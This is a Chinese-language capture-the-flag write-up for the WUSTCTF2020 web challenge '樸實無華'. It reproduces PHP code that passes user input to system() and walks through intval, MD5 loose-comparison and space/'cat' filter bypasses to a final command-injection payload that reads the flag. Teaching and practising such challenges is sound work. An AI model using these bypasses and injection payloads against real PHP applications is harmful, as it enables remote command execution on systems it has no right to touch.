1. 程式人生 > 實用技巧 >刷題[WUSTCTF2020]樸實無華

刷題[WUSTCTF2020]樸實無華

解題思路

開啟是一個這樣的頁面,檢視原始碼發現什麼人間極樂bot,試試是不是robots.txt,檢視發現類似flag檔案,檢視發現是假的flag,但是burp抓包後發現,返回的頭部有資訊

原始碼出來了,程式碼審計一波

程式碼審計

<?php 
header('Content-type:text/html;charset=utf-8'); 
error_reporting(0); 
highlight_file(__file__); 


//level 1 
if (isset($_GET['num'])){ 
    $num = $_GET['num']; 
    if(intval($num) < 2020 && intval($num + 1) > 2021){ 
        echo "我不經意間看了看我的勞力士, 不是想看時間, 只是想不經意間, 讓你知道我過得比你好.</br>"; 
    }else{ 
        die("金錢解決不了窮人的本質問題"); 
    } 
}else{ 
    die("去非洲吧"); 
} 
//level 2 
if (isset($_GET['md5'])){ 
   $md5=$_GET['md5']; 
   if ($md5==md5($md5)) 
       echo "想到這個CTFer拿到flag後, 感激涕零, 跑去東瀾岸, 找一家餐廳, 把廚師轟出去, 自己炒兩個拿手小菜, 倒一杯散裝白酒, 致富有道, 別學小暴.</br>"; 
   else 
       die("我趕緊喊來我的酒肉朋友, 他打了個電話, 把他一家安排到了非洲"); 
}else{ 
    die("去非洲吧"); 
} 

//get flag 
if (isset($_GET['get_flag'])){ 
    $get_flag = $_GET['get_flag']; 
    if(!strstr($get_flag," ")){ 
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag); 
        echo "想到這裡, 我充實而欣慰, 有錢人的快樂往往就是這麼的樸實無華, 且枯燥.</br>"; 
        system($get_flag); 
    }else{ 
        die("快到非洲了"); 
    } 
}else{ 
    die("去非洲吧"); 
} 
?> 

大致看看,有幾層,成功繞後最後,可以通過system函式程式碼執行

第一層intval函式,算常見的考點吧,也總結過

那麼我們直接num=0x32303231 (即2021的16進位制)

第二層md5弱型別比較,我們只要找一個字串在md5處理後能通過弱比較即可

第三層也很簡單,繞過空格和cat即可,這都總結過

最終payload:/fl4g.php?num=0x32303231&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

總結思路

比較常規,跟著他一步一步走即可

知識點

  • php騷操作